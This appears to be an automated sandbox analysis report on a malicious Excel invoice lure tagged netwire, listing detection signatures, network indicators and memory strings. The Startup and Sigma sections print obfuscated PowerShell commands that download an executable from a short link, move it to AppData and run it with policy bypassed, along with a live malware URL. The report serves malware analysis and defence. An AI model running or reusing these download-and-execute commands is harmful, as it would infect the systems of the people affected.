
Analysis Report Proforma Invoice.xls

Overview

General Information

Sample Name: Proforma Invoice.xls
Analysis ID: 320373
MD5: 55db711144ff4a35faf58d982e7cf727
SHA1: ea7b59dde9f0600915069dec66f8410f25cb66fd
SHA256: 6e76bd502c91158631cadf485ce44caa4d6504864735593fc23d90477a794d17
Tags: netwire, xls


Detection

Hidden Macro 4.0
Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Bypasses PowerShell execution policy
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found obfuscated Excel 4.0 Macro
Obfuscated command line found
Sigma detected: Microsoft Office Product Spawning Windows Shell
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Document contains an embedded VBA macro which executes code when the document is opened / closed
Document contains embedded VBA macros
Enables debug privileges
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2452 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • cmd.exe (PID: 2564 cmdline: cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe') MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2880 cmdline: powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe') MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 2532 cmdline: cmd /c power^shell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}' MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 2724 cmdline: powershell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}' MD5: 852D67A27E454BD389FA7F02A8CBE23F)
    • cmd.exe (PID: 2372 cmdline: cmd /c power^shell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe MD5: 5746BD7E255DD6A8AFA06F7C42C1BA41)
      • powershell.exe (PID: 1980 cmdline: powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe MD5: 852D67A27E454BD389FA7F02A8CBE23F)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started | Author: Michael Haag, Florian Roth, Markus Neis | Data: Command: cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe'), CommandLine: cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe'), CommandLine|base64offset|contains: rg, Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2452, ProcessCommandLine: cmd /c power^shell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe'), ProcessId: 2564

Signature Overview


AV Detection:

Antivirus detection for URL or domain
Source: https://shopphongtinh.com/Ubnccbruoun7.exe | Avira URL Cloud: Label: malware
Multi AV Scanner detection for submitted file
Source: Proforma Invoice.xls | Virustotal: Detection: 14%
Source: Proforma Invoice.xls | ReversingLabs: Detection: 20%
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini

Software Vulnerabilities:

Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\cmd.exe
Source: global traffic | DNS query: name: cutt.ly
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 104.22.1.232:443
Source: Joe Sandbox View | IP Address: 202.92.6.10
Source: Joe Sandbox View | IP Address: 104.22.1.232
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS
Source: Joe Sandbox View | JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: powershell.exe, 00000007.00000002.2125698867.000000001CD10000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: powershell.exe, 00000007.00000002.2117235750.000000000030F000.00000004.00000020.sdmp | String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: unknown | DNS traffic detected: queries for: cutt.ly
Source: powershell.exe, 00000007.00000003.2112365835.000000001D178000.00000004.00000001.sdmp | String found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0=
Source: powershell.exe, 00000007.00000003.2112365835.000000001D178000.00000004.00000001.sdmp | String found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraiz.crl0
Source: powershell.exe, 00000007.00000003.2112227615.000000001D121000.00000004.00000001.sdmp | String found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
Source: powershell.exe, 00000007.00000002.2125152617.000000001B800000.00000004.00000001.sdmp | String found in binary or memory: http://ca.sia.it/seccli/repository/CRL.der0J
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | String found in binary or memory: http://ca.sia.it/secsrv/repository/CRL.der0J
Source: powershell.exe, 00000007.00000002.2123509542.000000000371A000.00000004.00000001.sdmp | String found in binary or memory: http://cacerts.rapidssl.com/RapidSSLTLSRSACAG1.crt0
Source: powershell.exe, 00000007.00000002.2123509542.000000000371A000.00000004.00000001.sdmp | String found in binary or memory: http://cdp.rapidssl.com/RapidSSLTLSRSACAG1.crl0L
Source: powershell.exe, 00000007.00000002.2125416814.000000001B8DF000.00000004.00000001.sdmp | String found in binary or memory: http://certificates.starfieldtech.com/repository/1604
Source: powershell.exe, 00000007.00000003.2112341671.000000001D173000.00000004.00000001.sdmp | String found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | String found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | String found in binary or memory: http://cps.chambersign.org/cps/publicnotaryroot.html0
Source: powershell.exe, 00000007.00000003.2112341671.000000001D173000.00000004.00000001.sdmp | String found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | String found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | String found in binary or memory: http://crl.chambersign.org/publicnotaryroot.crl0
Source: powershell.exe, 00000007.00000003.2112341671.000000001D173000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: powershell.exe, 00000007.00000002.2127374237.000000001D11D000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/COMODOCertificationAuthority.crl0
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/TrustedCertificateServices.crl0:
Source: powershell.exe, 00000007.00000002.2125202164.000000001B83B000.00000004.00000001.sdmp | String found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: powershell.exe, 00000007.00000002.2125255546.000000001B876000.00000004.00000001.sdmp | String found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: powershell.exe, 00000007.00000002.2125255546.000000001B876000.00000004.00000001.sdmp | String found in binary or memory: http://crl.entrust.net/server1.crl0
Source: powershell.exe, 00000007.00000003.2112227615.000000001D121000.00000004.00000001.sdmp | String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmp | String found in binary or memory: http://crl.netsolssl.com/NetworkSolutionsCertificateAuthority.crl0
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | String found in binary or memory: http://crl.oces.certifikat.dk/oces.crl0
Source: powershell.exe, 00000007.00000002.2125382538.000000001B8DC000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pki.wellsfargo.com/wsprca.crl0
Source: powershell.exe, 00000007.00000002.2125255546.000000001B876000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: powershell.exe, 00000007.00000002.2125255546.000000001B876000.00000004.00000001.sdmp | String found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: powershell.exe, 00000007.00000002.2127374237.000000001D11D000.00000004.00000001.sdmp | String found in binary or memory: http://crl.securetrust.com/SGCA.crl0
Source: powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmp | String found in binary or memory: http://crl.securetrust.com/STCA.crl0
Source: powershell.exe, 00000007.00000002.2125382538.000000001B8DC000.00000004.00000001.sdmp | String found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
Source: powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmp | String found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | String found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
Source: powershell.exe, 00000007.00000002.2123509542.000000000371A000.00000004.00000001.sdmp | String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl0c
Source: powershell.exe, 00000007.00000002.2127591509.000000001D1CD000.00000004.00000001.sdmp | String found in binary or memory: http://ctldl.windows
Source: powershell.exe, 00000007.00000002.2117256684.000000000034B000.00000004.00000020.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: powershell.exe, 00000007.00000002.2127455565.000000001D133000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.2125516730.000000001B8F8000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.2125255546.000000001B876000.00000004.00000001.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/DF3C24F9BFD666761B268073FE06D
Source: powershell.exe, 00000007.00000003.2111885324.000000001D137000.00000004.00000001.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: powershell.exe, 00000007.00000002.2125332745.000000001B8C4000.00000004.00000001.sdmp | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cabe
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | String found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
Source: powershell.exe, 00000007.00000002.2125202164.000000001B83B000.00000004.00000001.sdmp | String found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
Source: powershell.exe, 00000007.00000002.2125698867.000000001CD10000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com
Source: powershell.exe, 00000007.00000002.2125698867.000000001CD10000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/
Source: powershell.exe, 00000007.00000002.2127038409.000000001CEF7000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: powershell.exe, 00000007.00000002.2127038409.000000001CEF7000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: powershell.exe, 00000007.00000002.2125255546.000000001B876000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000007.00000002.2125255546.000000001B876000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0%
Source: powershell.exe, 00000007.00000002.2125202164.000000001B83B000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0-
Source: powershell.exe, 00000007.00000002.2125202164.000000001B83B000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com0/
Source: powershell.exe, 00000007.00000002.2125255546.000000001B876000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.comodoca.com05
Source: powershell.exe, 00000007.00000002.2123509542.000000000371A000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.digicert.com0B
Source: powershell.exe, 00000007.00000002.2125255546.000000001B876000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.entrust.net03
Source: powershell.exe, 00000007.00000002.2125255546.000000001B876000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.entrust.net0D
Source: powershell.exe, 00000007.00000002.2125416814.000000001B8DF000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.infonotary.com/responder.cgi0V
Source: powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmp | String found in binary or memory: http://ocsp.pki.gva.es0
Source: powershell.exe, 00000007.00000002.2125416814.000000001B8DF000.00000004.00000001.sdmp | String found in binary or memory: http://pki-root.ecertpki.cl/CertEnroll/E-CERT%20ROOT%20CA.crl0
Source: powershell.exe, 00000007.00000002.2125416814.000000001B8DF000.00000004.00000001.sdmp | String found in binary or memory: http://repository.infonotary.com/cps/qcps.html0$
Source: powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmp | String found in binary or memory: http://repository.swisssign.com/0
Source: powershell.exe, 00000007.00000002.2117820779.0000000002380000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2153355940.0000000002330000.00000002.00000001.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: powershell.exe, 00000007.00000002.2127649611.000000001D2F0000.00000002.00000001.sdmp | String found in binary or memory: http://servername/isapibackend.dll
Source: powershell.exe, 00000007.00000002.2127038409.000000001CEF7000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: powershell.exe, 00000007.00000002.2123509542.000000000371A000.00000004.00000001.sdmp | String found in binary or memory: http://status.rapidssl.com0
Source: powershell.exe, 00000007.00000002.2127038409.000000001CEF7000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: powershell.exe, 00000007.00000002.2117820779.0000000002380000.00000002.00000001.sdmp, powershell.exe, 00000009.00000002.2153355940.0000000002330000.00000002.00000001.sdmp | String found in binary or memory: http://www.%s.comPA
Source: powershell.exe, 00000007.00000002.2127455565.000000001D133000.00000004.00000001.sdmp | String found in binary or memory: http://www.a-cert.at/certificate-policy.html0
Source: powershell.exe, 00000007.00000002.2127455565.000000001D133000.00000004.00000001.sdmp | String found in binary or memory: http://www.a-cert.at/certificate-policy.html0;
Source: powershell.exe, 00000007.00000002.2127455565.000000001D133000.00000004.00000001.sdmp | String found in binary or memory: http://www.a-cert.at0E
Source: powershell.exe, 00000007.00000002.2125332745.000000001B8C4000.00000004.00000001.sdmp | String found in binary or memory: http://www.acabogacia.org/doc0
Source: powershell.exe, 00000007.00000002.2125332745.000000001B8C4000.00000004.00000001.sdmp | String found in binary or memory: http://www.acabogacia.org0
Source: powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmp | String found in binary or memory: http://www.ancert.com/cps0
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | String found in binary or memory: http://www.certicamara.com/certicamaraca.crl0
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | String found in binary or memory: http://www.certicamara.com/certicamaraca.crl0;
Source: powershell.exe, 00000007.00000002.2125416814.000000001B8DF000.00000004.00000001.sdmp | String found in binary or memory: http://www.certicamara.com/dpc/0Z
Source: powershell.exe, 00000007.00000003.2112227615.000000001D121000.00000004.00000001.sdmp | String found in binary or memory: http://www.certicamara.com0
Source: powershell.exe, 00000007.00000003.2112227615.000000001D121000.00000004.00000001.sdmp | String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAI.crl0
Source: powershell.exe, 00000007.00000003.2112254528.000000001D155000.00000004.00000001.sdmp | String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAII.crl0
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | String found in binary or memory: http://www.certificadodigital.com.br/repositorio/serasaca/crl/SerasaCAIII.crl0
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | String found in binary or memory: http://www.certifikat.dk/repository0
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | String found in binary or memory: http://www.certplus.com/CRL/class1.crl0
Source: powershell.exe, 00000007.00000002.2127455565.000000001D133000.00000004.00000001.sdmp | String found in binary or memory: http://www.certplus.com/CRL/class2.crl0
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | String found in binary or memory: http://www.certplus.com/CRL/class3.crl0
Source: powershell.exe, 00000007.00000002.2125332745.000000001B8C4000.00000004.00000001.sdmp | String found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | String found in binary or memory: http://www.certplus.com/CRL/class3TS.crl0
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | String found in binary or memory: http://www.chambersign.org1
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | String found in binary or memory: http://www.comsign.co.il/cps0
Source: powershell.exe, 00000007.00000002.2125416814.000000001B8DF000.00000004.00000001.sdmp | String found in binary or memory: http://www.crc.bg0
Source: powershell.exe, 00000007.00000002.2125255546.000000001B876000.00000004.00000001.sdmp | String found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: powershell.exe, 00000007.00000002.2125255546.000000001B876000.00000004.00000001.sdmp | String found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | String found in binary or memory: http://www.digsigtrust.com/DST_TRUST_CPS_v990701.html0
Source: powershell.exe, 00000007.00000003.2112227615.000000001D121000.00000004.00000001.sdmp | String found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
Source: powershell.exe, 00000007.00000003.2112227615.000000001D121000.00000004.00000001.sdmp | String found in binary or memory: http://www.disig.sk/ca0f
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | String found in binary or memory: http://www.dnie.es/dpc0
Source: powershell.exe, 00000007.00000003.2112290528.000000001B8DE000.00000004.00000001.sdmp | String found in binary or memory: http://www.e-certchile.cl/html/productos/download/CPSv1.7.pdf01
Source: powershell.exe, 00000007.00000002.2125332745.000000001B8C4000.00000004.00000001.sdmp | String found in binary or memory: http://www.e-me.lv/repository0
Source: powershell.exe, 00000007.00000002.2127374237.000000001D11D000.00000004.00000001.sdmp | String found in binary or memory: http://www.e-szigno.hu/RootCA.crl
Source: powershell.exe, 00000007.00000002.2127374237.000000001D11D000.00000004.00000001.sdmp | String found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
Source: powershell.exe, 00000007.00000002.2127374237.000000001D11D000.00000004.00000001.sdmp | String found in binary or memory: http://www.e-szigno.hu/SZSZ/0
Source: powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmp | String found in binary or memory: http://www.e-trust.be/CPS/QNcerts
Source: powershell.exe, 00000007.00000002.2127455565.000000001D133000.00000004.00000001.sdmp | String found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | String found in binary or memory: http://www.entrust.net/CRL/Client1.crl0
Source: powershell.exe, 00000007.00000002.2127455565.000000001D133000.00000004.00000001.sdmp | String found in binary or memory: http://www.entrust.net/CRL/net1.crl0
Source: powershell.exe, 00000007.00000002.2117235750.000000000030F000.00000004.00000020.sdmp | String found in binary or memory: http://www.firmaprofesional.com0
Source: powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmp | String found in binary or memory: http://www.globaltrust.info0
Source: powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmp | String found in binary or memory: http://www.globaltrust.info0=
Source: powershell.exe, 00000007.00000002.2125698867.000000001CD10000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: powershell.exe, 00000007.00000002.2127038409.000000001CEF7000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: powershell.exe, 00000007.00000002.2125416814.000000001B8DF000.00000004.00000001.sdmp | String found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
Source: powershell.exe, 00000007.00000002.2123509542.000000000371A000.00000004.00000001.sdmp | String found in binary or memory: http://www.litespeedtech.com
Source: powershell.exe, 00000007.00000002.2125698867.000000001CD10000.00000002.00000001.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: powershell.exe, 00000007.00000002.2117235750.000000000030F000.00000004.00000020.sdmp, powershell.exe, 00000009.00000002.2152554964.00000000002CE000.00000004.00000020.sdmp, powershell.exe, 0000000A.00000002.2164576131.000000000009E000.00000004.00000020.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
Source: powershell.exe, 00000007.00000002.2117235750.000000000030F000.00000004.00000020.sdmp, powershell.exe, 00000009.00000002.2152554964.00000000002CE000.00000004.00000020.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: powershell.exe, 00000007.00000002.2125416814.000000001B8DF000.00000004.00000001.sdmp | String found in binary or memory: http://www.pki.admin.ch/policy/CPS_2_16_756_1_17_3_21_1.pdf0
Source: powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmp | String found in binary or memory: http://www.pki.gva.es/cps0
Source: powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmp | String found in binary or memory: http://www.pki.gva.es/cps0%
Source: powershell.exe, 00000007.00000003.2112254528.000000001D155000.00000004.00000001.sdmp | String found in binary or memory: http://www.pkioverheid.nl/policies/root-policy0
Source: powershell.exe, 00000007.00000002.2125416814.000000001B8DF000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | String found in binary or memory: http://www.post.trust.ie/reposit/cps.html0
Source: powershell.exe, 00000007.00000003.2112341671.000000001D173000.00000004.00000001.sdmp | String found in binary or memory: http://www.quovadis.bm0
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | String found in binary or memory: http://www.quovadisglobal.com/cps0
Source: powershell.exe, 00000007.00000003.2112365835.000000001D178000.00000004.00000001.sdmp | String found in binary or memory: http://www.registradores.org/scr/normativa/cp_f2.htm0
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | String found in binary or memory: http://www.rootca.or.kr/rca/cps.html0
Source: powershell.exe, 00000007.00000003.2112365835.000000001D178000.00000004.00000001.sdmp | String found in binary or memory: http://www.signatur.rtr.at/current.crl0
Source: powershell.exe, 00000007.00000003.2112365835.000000001D178000.00000004.00000001.sdmp | String found in binary or memory: http://www.signatur.rtr.at/de/directory/cps.html0
Source: powershell.exe, 00000007.00000003.2112341671.000000001D173000.00000004.00000001.sdmp | String found in binary or memory: http://www.sk.ee/cps/0
Source: powershell.exe, 00000007.00000003.2112341671.000000001D173000.00000004.00000001.sdmp | String found in binary or memory: http://www.sk.ee/juur/crl/0
Source: powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmp | String found in binary or memory: http://www.ssc.lt/cps03
Source: powershell.exe, 00000007.00000003.2112227615.000000001D121000.00000004.00000001.sdmp | String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_2_ca_II.crl
Source: powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmp | String found in binary or memory: http://www.trustcenter.de/crl/v2/tc_class_3_ca_II.crl
Source: powershell.exe, 00000007.00000002.2127330228.000000001D0F0000.00000004.00000001.sdmp | String found in binary or memory: http://www.trustcenter.de/guidelin
Source: powershell.exe, 00000007.00000002.2127455565.000000001D133000.00000004.00000001.sdmp | String found in binary or memory: http://www.trustcenter.de/guidelines0
Source: powershell.exe, 00000007.00000003.2112227615.000000001D121000.00000004.00000001.sdmp | String found in binary or memory: http://www.trustdst.com/certificates/policy/ACES-index.html0
Source: powershell.exe, 00000007.00000003.2112206947.00000000003AE000.00000004.00000001.sdmp | String found in binary or memory: http://www.valicert.com/1
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | String found in binary or memory: http://www.wellsfargo.com/certpolicy0
Source: powershell.exe, 00000007.00000002.2125698867.000000001CD10000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv.
Source: powershell.exe, 00000007.00000002.2125152617.000000001B800000.00000004.00000001.sdmp | String found in binary or memory: https://ca.sia.it/seccli/repository/CPS0
Source: powershell.exe, 00000007.00000003.2112302697.000000001D0F5000.00000004.00000001.sdmp | String found in binary or memory: https://ca.sia.it/secsrv/repository/CPS0
Source: powershell.exe, 00000007.00000002.2123509542.000000000371A000.00000004.00000001.sdmp | String found in binary or memory: https://cutt.l
Source: powershell.exe, 00000007.00000002.2123509542.000000000371A000.00000004.00000001.sdmp | String found in binary or memory: https://cutt.ly
Source: powershell.exe, 00000007.00000002.2123429588.000000000360E000.00000004.00000001.sdmp | String found in binary or memory: https://cutt.ly/
Source: powershell.exe, 00000007.00000002.2117235750.000000000030F000.00000004.00000020.sdmp, powershell.exe, 00000007.00000002.2123429588.000000000360E000.00000004.00000001.sdmp | String found in binary or memory: https://cutt.ly/ZhqUH1O
Source: powershell.exe, 00000007.00000002.2123429588.000000000360E000.00000004.00000001.sdmp | String found in binary or memory: https://cutt.ly/ZhqUH1OPE
Source: powershell.exe, 00000007.00000003.2112341671.000000001D173000.00000004.00000001.sdmp | String found in binary or memory: https://ocsp.quovadisoffshore.com0
Source: powershell.exe, 00000007.00000002.2127374237.000000001D11D000.00000004.00000001.sdmp | String found in binary or memory: https://rca.e-szigno.hu/ocsp0-
Source: powershell.exe, 00000007.00000002.2123509542.000000000371A000.00000004.00000001.sdmp | String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: powershell.exe, 00000007.00000002.2127455565.000000001D133000.00000004.00000001.sdmp | String found in binary or memory: https://secure.a-cert.at/cgi-bin/a-cert-advanced.cgi0
Source: powershell.exe, 00000007.00000002.2125202164.000000001B83B000.00000004.00000001.sdmp | String found in binary or memory: https://secure.comodo.com/CPS0
Source: powershell.exe, 00000007.00000002.2123509542.000000000371A000.00000004.00000001.sdmp | String found in binary or memory: https://shopphongtinh.com
Source: powershell.exe, 00000007.00000002.2123509542.000000000371A000.00000004.00000001.sdmp | String found in binary or memory: https://shopphongtinh.com/Ubnccbruoun7.exe
Source: powershell.exe, 00000007.00000002.2123509542.000000000371A000.00000004.00000001.sdmp | String found in binary or memory: https://shopphongtinh.comp
Source: powershell.exe, 00000007.00000002.2125516730.000000001B8F8000.00000004.00000001.sdmp, powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmp | String found in binary or memory: https://www.catcert.net/verarrel
Source: powershell.exe, 00000007.00000002.2125516730.000000001B8F8000.00000004.00000001.sdmp | String found in binary or memory: https://www.catcert.net/verarrel05
Source: powershell.exe, 00000007.00000003.2112187859.000000001B8F0000.00000004.00000001.sdmp | String found in binary or memory: https://www.certification.tn/cgi-bin/pub/crl/cacrl.crl0
